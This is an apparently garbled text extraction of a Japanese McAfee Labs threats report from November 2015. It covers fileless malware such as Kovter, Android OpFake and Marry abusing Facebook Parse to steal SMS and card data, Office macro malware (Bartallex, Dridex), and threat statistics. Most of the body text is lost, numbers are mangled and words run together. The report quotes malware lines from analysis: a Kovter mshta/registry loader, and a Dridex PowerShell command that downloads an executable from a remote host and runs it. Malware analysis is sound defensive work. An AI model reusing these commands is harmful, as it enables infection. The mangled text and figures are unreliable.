McAfee Labs 1 327 1 5 McAfee Labs McAfee Labs Web McAfee Labs McAfee is now part of Intel Security. www.mcafee.com/jp/mcafee-labs.aspx McAfee Labs 1 1

McAfee Labs 215 11

McAfee Labs 1 327 1 5 McAfee Labs McAfee Labs Web McAfee Labs McAfee is now part of Intel Security. www.mcafee.com/jp/mcafee-labs.aspx McAfee Labs 1 11 McAfee Labs 216 2 5 Intel Security 21 22 216 McAfee Labs 215 11 2

Cyber Threat Alliance Intel Security Lucrative Ransomware Attacks: Analysis of the CryptoWall Version 3 Threat : CryptoWall 3Intel Security Symantec Palo Alto Networks Fortinet 3 2,5 CryptoWall 3 Intel Security FOCUS 15 Security Conference 5 2 3 McAfee Labs McAfee Labs McAfee Labs : 215 11 3 Microsoft Windows... McAfee Labs Intel Security McAfee GTI DAT McAfee Labs McAfee Global Threat Intelligence McAfee GTI Cloud 3 McAfee GTI 1 : 445 URL : 1 74 : 1 35 : 1 74 IP IP : 1 22 5 Vincent Weafer /McAfee Labs 3 McAfee Labs 215 11 3

McAfee Labs 215 11 : Carlos Castillo Diwakar Dinkar Paula Greve Suriya Natarajan François Paget Eric Peterson Arun Pradeep Avelino Rico Craig Schmugar Rakesh Sharma Rick Simon Dan Sommer Bing Sun Chong Xu 5 7 8 16 34 48

Windows Management Instrumentation Windows PowerShell Kovter Powelike XswKit McAfee Labs Siegfried Rasthofer Eric Bodden McAfee Labs 3 2 5,6 294,817 16 2 Android/OpFake Android/Marry McAfee Labs 215 11 5

199 Melissa WM.Concept Microsoft McAfee Labs 215 11 6

Arun Pradeep Suriya Natarajan Windows Management Instrumentation Windows PowerShell Kovter Powelike XswKit 214 215 McAfee Labs 215 3 374,471 2, 18, 16, 14, 12, 1, 8, 6, 4, 2, ファイルレス マルウェアの 推 移 1 月 2 月 3 月 4 月 5 月 6 月 7 月 8 月 9 月 1 月 215 年 McAfee Labs 215 11 8

3 : Windows : API Windows : Windows OS Windows Windows Windows Kovter Powelike XswKit Windows McAfee Labs 215 11 9

一 般 的 なファイルレス マルウェアの 感 染 フロー スパム キャンペーン ドロッパー 作 成 不 正 な Web サイト JavaScript を 含 む レジストリの 実 行 サムネイル キャッシュ レジストリ 項 目 実 行 実 行 Powershell 暗 号 化 された スクリプトの 実 行 不 正 な ペイロード 正 規 プロセスのメモリー 空 間 で 不 正 なコードを 実 行 : McAfee Labs, 215 Kovter Powelike JavaScript NULL : ACL NULL ACL ACL McAfee Labs 215 11 1

NULL : 1 NULL Windows NULL NULL NULL Windows OS Windows Management Instrumentation PowerShell Windows Management Instrumentation WMI : WMI Microsoft Web-Based Enterprise Management WBEM MicrosoftJavaScript PowerShell: Windows PowerShell Microsoft.NET Framework Base64 PowerShell PowerShell Ly9oS6=TN25.Run( C:\\Windows\\System32\\WindowsPowerShell\\v1.\\ powershell.exe iex $env:csnvjgc,,1) このレポートを 共 有 McAfee Labs 215 11 11

McAfee Labs Kovter Kovter NULL Run JavaScript NULL NULL Run HKCU\Software mshta javascript:wnd1w7pry= X ;yg2=new%2 ActiveXObject( WScript.Shell );COlM2JWez= pkilsi ;VrAD6=yg2. RegRead( HKCU\\software\\3cf54da\\ e925fae2 );YJa6FFTM= nl ;eval(vrad6);asc7rr9oj= hazrr ; HKCU\Software JavaScript McAfee Labs 215 11 12

JavaScript Base64 Base64 Base64 PowerShell Base64 PowerShell PowerShell PowerShell Regsvr32.exe Svchost.exe Dllhost.exe PowerShell hxxp://185.5.25.23/upload.php 32 /64.NET Framework Adobe Flash Player McAfee Labs 215 11 13

Kovter Mode 1 UID 5BD39AA1CAF61D76 ID OS Win 7, SP1 IL:3 OS OS bits x32 V 2..3.5 aff_id 61 ID Oslang ENU OS GMT GMT +5:3 Threads Online 355 Total RAM 247 RAM Load RAM RAM Free RAM 144 RAM CPU Load 7 CPU Antispyware Windows Defender Kovter &antivirus=mcafee VirusScan Enterprise AntiWireShark &antidetect=antivmware McAfee Labs 215 11 14

Intel Security.NET Framework Adobe Flash Player Internet Explorer Web Flash Kovter Web Kovter Web Web McAfee Labs CryptoWall Kovter Kovter NULL Windows Web Web Intel Security McAfee Labs 215 11 15

Carlos Castillo : https://www.sit.fraunhofer.de/fileadmin/bilder/presse/appdatathreat_pressebild.jpg. Amazon Google Facebook BaaS Backend-as-a-Service Web BaaS McAfee Labs 3 Siegfried Rasthofer Eric Bodden McAfee Labs BaaS 3 Facebook Parse CloudMine Amazon AWS 2 5,6 BaaS McAfee Labs 215 11 16

BaaS Web : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf Facebook Parse BaaS BaaS BaaS 7 McAfee Labs Rasthofer Bodden 294,817 Facebook ParseBaaS 16 9 NewTasks SmsReceiver TaskManager McAfee Labs 215 11 17

BaaS5 Facebook Parse 2 Android/OpFake Android/Marry : SMS BaaS Android/OpFake Чат для друзей. ДругВокруг Установка Android/OpFake Android/OpFake McAfee Labs 215 11 18

Facebook Parse Facebook Parse BaaS 着 信 ブート 完 了 アプリの 実 行 メイン サービスの 開 始 アイコンを 隠 す チャネル: D-<デバイスID> すべて 国 (SIM ISO) ウェルカム メインの 指 令 サーバーの URL をローカルに 保 存 終 了 Parse プッシュ 通 知 を 登 録 Parse インストール 情 報 を 保 存 非 同 期 タスクの 実 行 IMEI SIM の 国 コード SIM オペレーター 電 話 番 号 API ブランド モデル is_worked ( 真 ) worked_task ( 真 ) is_root デバイス 情 報 を 指 令 サーバーの /bn/reg.php に 送 信 システム アラームを 設 定 IMEI SIM の 国 コード 電 話 番 号 SIM オペレーター 残 高 1 分 ごとにコンテンツ レシーバーを 実 行 Android/OpFake : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf McAfee Labs 215 11 19

1 Facebook Parse NewTasks TaskManager システム アラーム コンテンツ レシーバー を 実 行 デバイス ID で Parse テーブル NewTasks を 照 会 IMEI== デバイス ID いいえ 終 了 はい いいえ タスクを プッシュ 新 しいタスク を 実 行 type== タスク IMEI== デバイス ID type: NewTasks から task: タイプと 引 数 hash: 識 別 子 IMEI: デバイス ID response: 空 実 行 したタスクを TaskManager テーブルに 保 存 はい 終 了 Intercept フラグを On/Off に 設 定 はい Task == Intercept いいえ Facebook Parse NewTasks Android/OpFake : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf McAfee Labs 215 11 2

Android/OpFake intercept enable/disable NewTasks Android/OpFake SMS NewTasks SMS USSD URI tel: USSD URL NewTasks URL Web New_server URL Install NewTasks URL SD APK pm installapk NewTasks SMS Android/OpFake Facebook Parse SmsReceiver Facebook Parse T Intercept SMS MegaFon McAfee Labs 215 11 21

from content to: imei type: service/ other is_card: コンテンツ に cc # が 含 まれる 場 合 intype: 受 信 メッセージを SmsReceiver テーブルに 保 存 タスク ハッシュで TaskManager を 照 会 応 答 ( 本 文 から) を TaskManager に 保 存 はい SMS メッセージを 受 信 SMS メッセージを 処 理 Intercept フラグが On? はい 前 に 送 信 した SMS の 応 答 か? いいえ 終 了 いいえ いいえ imei phone: 送 信 元 message type: 受 信 メッセージ データを Parse プッシュ チャネル I に 送 信 メッセージを /bn/save_message.php に 送 信 送 信 元 に 8811 または 1 が 含 まれる? はい メッセージ 本 文 から 残 高 を 抽 出 して 保 存 SMS Android/OpFake Facebook Parse : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf Android/OpFake NewTasks SMS response McAfee Labs 215 11 22

: Facebook Parse Android/OpFake Facebook Parse Facebook Parse Android/OpFake Parse NewTasks SMS: ID Intercept: / New_server: URL Install: ID APKURL SmsReceiver SMS From: SMS/ Intype: / To: ID Is_card: true/false Type: MegaFon service other TaskManager 25 Facebook Parse Android/OpFake 4 Android/Marry D NewTasks 6 25 6 25 Facebook Parse NewTasks 6 25 McAfee Labs 215 11 23

NewTasks コマンド 実 行 記 録 の 作 成 日 14, 12, 1, 8, 6, 4, 2, 13 15 17 19 21 23 25 27 29 1 3 5 7 9 11 13 215 年 6 月 215 年 7 月 アカウント A (OpFake) アカウント D (Marry) アカウント B (OpFake) アカウント E (OpFake) アカウント C (OpFake) : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf NewTasks SMS B E Android/OpFake 5, 6, D Android/Marry NewTasks テーブルのコマンド 数 ( 種 類 別 ) 7, 6, 5, 4, 3, 2, 1, アカウント A (OpFake) アカウント B (OpFake) アカウント C (OpFake) アカウント D (Marry) アカウント E (OpFake) すべて SMS Intercept New_server Install : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf McAfee Labs 215 11 24

Android/OpFake Android/ Marry 2 SMS TaskManager SMS Install NewTasks New_server: hxxp://newwelcome.ru hxxp://newelcome.ru Install: Android/OpFake Android/Marry : hxxp://newwelcome.ru/appru.apk (marry.adobe.net. threadsync) hxxp://newwelcome.ru/app.apk (marry.adobe.net.nightbuid) hxxp://notingen.ru/player.apk (com.adobe.net) hxxp://швждаыдлпждв SmsReceiver E Android/OpFake 6, SMSB 41, SmsReceiver テーブルのメッセージ 数 7, 6, 5, 4, 3, 2, 1, アカウント E (OpFake) アカウント B (OpFake) アカウント A (OpFake) アカウント C (OpFake) アカウント D (Marry) : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf Android/OpFake 17, SMS NewTasks McAfee Labs 215 11 25

SmsReceiver is_card 2 SMS 盗 まれたクレジットカード 番 号 の 数 (2か 月 の 調 査 期 間 内 ) 14 12 1 8 6 4 2 アカウント D (Marry) アカウント E (OpFake) アカウント B (OpFake) アカウント A (OpFake) アカウント C (OpFake) : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf SMS 6 16 6 24 16, SmsReceiver コマンド 実 行 記 録 の 作 成 日 14, 12, 1, 8, 6, 4, 2, 8 1 12 14 16 18 2 22 24 26 28 3 2 4 6 8 1 12 14 16 215 年 6 月 215 年 7 月 アカウント A (OpFake) アカウント D (Marry) アカウント B (OpFake) アカウント E (OpFake) アカウント C (OpFake) : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf McAfee Labs 215 11 26

TaskManager D Android/Marry TaskManager テーブルに 記 録 されたコマンドの 種 類 21, 18, 15, 12, 9, 6, 3, アカウント A (OpFake) アカウント B (OpFake) アカウント C (OpFake) アカウント D (Marry) アカウント E (OpFake) 要 求 応 答 SMS Intercept Install : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf NewTasks Android/ Marry 2, TaskManager Android/Marry D SMS Android/Marry D McAfee Labs 215 11 27

攻 撃 された 会 社 ごとの SMS 要 求 数 (2か 月 の 調 査 期 間 内 ) 5,5 5, 4,5 4, 3,5 3, 2,5 2, 1,5 1, 5 Bank 5335 Bank 1 Bank 7937672265 Bank 159 Bank 3116 Bank 7878 Bank 6996 Bank 7494 Bank 16 Bank 9 : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf 9 SMS 5,35 SMS McAfee Labs 215 11 28

TaskManager BALANCE/ BALANS/баланс BALANS < 4 > VISA1234 :< > INFO/СПРАВКА СПРАВКА : VISA1234(ON) ПЕРЕВОД/ PEREVOD/ ПЕРЕВЕСТИ ( ПЕРЕВОД < 4 > < 4 > < > < > VISA1234 < > < > < > 9 ZAPROS ZAPROS < > < > VISA5678 < > < > TEL/PLATEZ/ PHONE/POPOLNI/ PLATI TEL < > < > VISA1234 < > < > < > < > 9 : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf NewTasksINFO 9 SMS : VISA1234 (ON) 9 TEL/PLATI NewTasks TaskManager NewTasks 9 ZAPROS BALANCE 2 McAfee Labs 215 11 29

コマンドごとの 要 求 数 (2か 月 の 調 査 期 間 内 ) 5, 4, 3, 2, 1, BALANCE/ BALANS/ /баланс ( 残 高 照 会 ) INFO/ СПРАВКА ( 情 報 ) ПЕРЕВОД/ PEREVOD/ ПЕРЕВЕСТИ ( 送 金 ) ZAPROS ( 要 求 ) TEL/PLATEZ/ PHONE/ POPOLNI/PLATI (モバイル 決 済 ) : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf D TaskManager VISA1234 :< > : VISA1234(ON) VISA1234 < > < > < > < > 9 VISA1234 < > < > < > < > < > : < > MAES1234: < > < > VISA1234: < > < > < > : < > VISA1234 < > < > < > 9 : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf McAfee Labs 215 11 3

/ : : : TaskManager テーブルで 確 認 された 銀 行 からの 応 答 (2か 月 の 調 査 期 間 内 ) 7 6 5 4 3 2 1 残 高 照 会 情 報 電 話 確 認 電 話 処 理 送 金 処 理 送 金 受 信 送 金 確 認 : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf 67 123 6 7 Pay Tel Transfer 141 McAfee Labs 215 11 31

IMEI android_id NewTasks TaskManager SMS Android/OpFake A B C E SMS Android/ Marry2 2 影 響 を 受 けたユーザー 数 (テーブル 別 ) (2か 月 の 調 査 期 間 内 ) 9, 8, 7, 6, 5, 4, 3, 2, 1, アカウント A (OpFake) アカウント B (OpFake) アカウント C (OpFake) アカウント D (Marry) アカウント E (OpFake) NewTasks SmsReceiver TaskManager : https://www.virusbtn.com/pdf/conference_slides/215/huber-etal-vb215.pdf 8 3 Rasthofer Bodden Facebook 8 6 Facebook 2 Facebook Parse SMS McAfee Labs 215 11 32

2 BaaS BaaS BaaS Facebook Parse 1 SMS Google PlaySMS McAfee Labs 215 11 33

Diwakar Dinkar Rakesh Sharma 199 Melissa WM.Concept Microsoft Microsoft Office Visual Basic for Applications Microsoft Word Word AutoExec: Word AutoNew: AutoOpen: AutoClose: AutoExit: Word Microsoft Word Word Excel1 Microsoft Office McAfee Labs 215 11 34

199 WM.Concept Melissa Microsoft Office WM.Concept: Word 1995 Melissa: McAfee Labs 1999 Melissa Word Word Melissa Word 97 Word 2 Word 2 Melissa Word 97/2 Outlook 5 Outlook 2% Microsoft Office Microsoft 2 3 Office 新 しいマクロ ウイルス 45, 4, 35, Office 6 3, 25, 2, 15, 1, 5, 213 年 214 年 215 年 : McAfee Labs, 215 McAfee Labs McAfee Labs 215 11 35

マクロ ウイルスによる 攻 撃 数 ( 地 域 別 ) 1% 1% 北 米 12% ヨーロッパ 13% 44% アジア 中 米 オセアニア 29% アフリカ 南 米 : McAfee Labs, 215 McAfee Labs 215 11 36

マクロ ウイルスの 感 染 の 流 れ マクロ 付 きの Office 文 書 をスパムで 送 信 ユーザーがマクロを 有 効 にして 実 行 マルウェアが 指 令 サーバーから 別 のマルウェアをダウンロード.doc.zip Fax-5478429-24835834 4478.63 Help Desk US McAfee Labs 215 11 37

WordWord Word McAfee Labs 215 11 38

Word 1.bat.vbs.ps PowerShell Bartallex Dridex Donoff Upatre Vawtrak Chanitor Zbot McAfee Labs PoS API McAfee Labs 215 11 39

Chr() ChrW() URL McAfee Labs 215 11 4

Auto_Open() Auto_Open() AutoOpen() Workbook_Open() Office Auto_ Open() Auto_Open() AutoOpen() Workbook_Open() 3 Func AutoOpen() Auto_Open End Func Func Workbook_Open Auto_Open End Func Func Auto_Open() Main_Func End Func Func Main_Func() URL の 復 号 ファイル パスの 復 号 End Func Func Download (URL, PATH) 最 終 ペイロードのダウンロード End Func XMLHTTP HTTP Send() URL Shell() McAfee Labs 215 11 41

XMLHTTP オブジェクトのインスタンス 化 HTTP 要 求 ボディの 準 備 Send() いいえ readystate==4? はい Variable= Response (ファイルのロード) 指 定 場 所 に コンテンツを 保 存 読 み 込 まれた ファイルを Shell() で 実 行 Bartallex 3 Bartallex Bartallex 2 BART212 = & d-up + date BART2 = Chr(97) + Chr(1) & & o & & b & e + ac & BART212 Chr Chr(97) a Chr(1) d McAfee Labs 215 11 42

BART2 = adobeacd-update Bartallex.vbs Upatre Vawtrak Chanitor Bartallex http:/xx.xxx.254.213.jpg McAfee Labs 215 11 43

Dridex Dridex 2 Base64 OfficeXML.xml.doc XML ActiveMime OLE XML Office OLE OLE PowerShell Dridex Office Word Excel OLE OLE OLE McAfee Labs 215 11 44

PowerShell powershell.exe cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile( hxxp://62.xx.xx.15 /asalt/assa. exe, %TEMP%\JIOiodfhioIH.cab ); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe; McAfee Labs 215 11 45

PowerShell DridexDridex DLL DLL explorer.exe rundll32.exe C:\XX.tmp NotifierInit Dridex rundll.exe Dridex Cridex GameOver Zeus Dridex McAfee Labs PoS Evoltin PC GUID HTTP Post Evoltin PowerShell PowerPoint McAfee Labs 215 11 46

Intel Security.doc.xls 1.3.1.2 2.2.1.1 IP ping Microsoft Office Office Intel Security McAfee Labs 215 11 47

Web

1,4, 新 しいモバイル マルウェア OS 1,2, 1,, 8, 6, 4, 2, 213 年 214 年 215 年 : McAfee Labs, 215 モバイル マルウェアの 合 計 1,, 9,, 8,, 7,, 6,, 5,, 4,, 3,, 2,, 1,, 213 年 214 年 215 年 : McAfee Labs, 215 McAfee Labs 215 11 49

215 3 地 域 ごとのモバイル マルウェアの 感 染 率 (215 年 ) 14% 12% 1% 8% 6% 4% 2% アフリカ アジア オーストラリア ヨーロッパ 北 米 南 米 : McAfee Labs, 215 世 界 のモバイル マルウェアの 感 染 率 22% 2% 18% 16% 14% 12% 1% 8% 6% 4% 2% 213 年 214 年 215 年 : McAfee Labs, 215 McAfee Labs 215 11 5

新 しいマルウェア 5,, McAfee Labs 4% 45,, 4,, 35,, 3,, 25,, 2,, 15,, 1,, 5,, 213 年 214 年 215 年 : McAfee Labs, 215 マルウェアの 合 計 5,, 215 5 45,, 4,, 35,, 3,, 25,, 2,, 15,, 1,, 5,, 213 年 214 年 215 年 : McAfee Labs, 215 McAfee Labs 215 11 51

新 しいルートキット マルウェア 1, 65% 28 Microsoft 64 Windows PatchGuard 214 1 2 1 9, 8, 7, 6, 5, 4, 3, 2, 1, 213 年 214 年 215 年 : McAfee Labs, 215 ルートキット マルウェアの 合 計 1,8, 1,6, 1,4, 1,2, 1,, 8, 6, 4, 2, 213 年 214 年 215 年 : McAfee Labs, 215 McAfee Labs 215 11 52

新 しいランサムウェア 1,4, 3 4% 2 Virus.Win32. PolyRansom.f 1,2, 1,, 8, 6, 4, 2, 213 年 214 年 215 年 : McAfee Labs, 215 ランサムウェアの 合 計 5,5, 5,, 4,5, 4,, 3,5, 3,, 2,5, 2,, 1,5, 1,, 5, 213 年 214 年 215 年 : McAfee Labs, 215 McAfee Labs 215 11 53

署 名 付 きの 新 しい 不 正 なバイナリ 2,5, 3 26% 214 2 2,25, 2,, 1,75, 1,5, 1,25, 1,, 75, 5, 25, 213 年 214 年 215 年 : McAfee Labs, 215 署 名 付 きの 不 正 なバイナリの 合 計 2,, 17,5, 15,, 12,5, 1,, 7,5, 5,, 2,5, 213 年 214 年 215 年 : McAfee Labs, 215 McAfee Labs 215 11 54

Mac Mac OS を 狙 う 新 しいマルウェア 3, Mac Mac OS 3 2 4 25, 2, 15, 1, 5, 213 年 214 年 215 年 : McAfee Labs, 215 Mac Mac OS を 狙 うマルウェアの 合 計 6, 55, 5, 45, 4, 35, 3, 25, 2, 15, 1, 5, 213 年 214 年 215 年 : McAfee Labs, 215 McAfee Labs 215 11 55

Web URL 新 しい 不 審 な 35,, 3,, 25,, 2,, 15,, 1,, 5,, 213 年 214 年 215 年 URL 関 連 ドメイン : McAfee Labs, 215 URL 新 しいフィッシング 詐 欺 のURL 2,5, 2,25, 2,, 1,75, 1,5, 1,25, 1,, 75, 5, 25, 213 年 214 年 215 年 URL 関 連 ドメイン : McAfee Labs, 215 McAfee Labs 215 11 56

URL 新 しいスパム 2,5, 2,, 1,5, 1,, 5, 213 年 214 年 215 年 URL 関 連 ドメイン : McAfee Labs, 215 世 界 で 発 生 したスパムとメールの 1 量 (1 兆 通 単 位 ) 11. 1. 9. 8. 7. 6. 5. 4. 3. 2. 1. 213 年 214 年 215 年 スパム 正 規 のメール : McAfee Labs, 215 McAfee Labs 215 11 57

1,4 1 スパム メールを 送 信 するボットネットの 1 上 位 1(1 万 通 単 位 ) 2 Kelihos 214 McAfee Labs 3 1,2 1, 8 6 4 2 213 年 214 年 215 年 Kelihos Darkmailer Dyre その 他 Slenfbot Cutwail Lethic Gamut Asprox Stealrat : McAfee Labs, 215 世 界 のボットネットの 分 布 215 3 Wapomi.exe DNS 2% 3% 21% 29% Wapomi Muieblackcat Sality Ramnit 4% Maazben 5% 8% 12% 14% Darkness NGRBot H-Worm その 他 : McAfee Labs, 215 McAfee Labs 215 11 58

ボットネット 指 令 サーバーが 最 も 多 く 存 在 する 国 215 3 米 国 中 国 38% 26% ドイツ ブラジル ロシア 6% 5% オランダ 韓 国 4% 4% 4% 5% 4% アルジェリア フランス その 他 : McAfee Labs, 215 ネットワーク 攻 撃 の 上 位 215 3 サービス 拒 否 ブラウザー 1% 2% 2% 19% 3% 総 当 り 攻 撃 SSL 2% 5% スキャン ボットネット 16% 23% Shellshock バックドア その 他 : McAfee Labs, 215 McAfee Labs 215 11 59

Intel Security 5 Intel Security Intel Security Security Connected Global Threat Intelligence Intel Security Intel Security www.intelsecurity.com McAfee Labs McAfee. Part of Intel Security. 15-43 1-12- 1 2F TEL 3-5428-11 FAX 3-5428-148 53-3 2-2-2 18F TEL 6-6344-1511 FAX 6-6344-1517 45-2 4-6-17 13F TEL 52-551-6233 FAX 52-551-6236 81-81 5-3-8 5F TEL 92-287-9674 www.intelsecurity.com Intel Intel McAfeeIntel Corporation McAfee, Inc. Copyright 215 Intel Corporation. 62189rpt_nov-threats_1215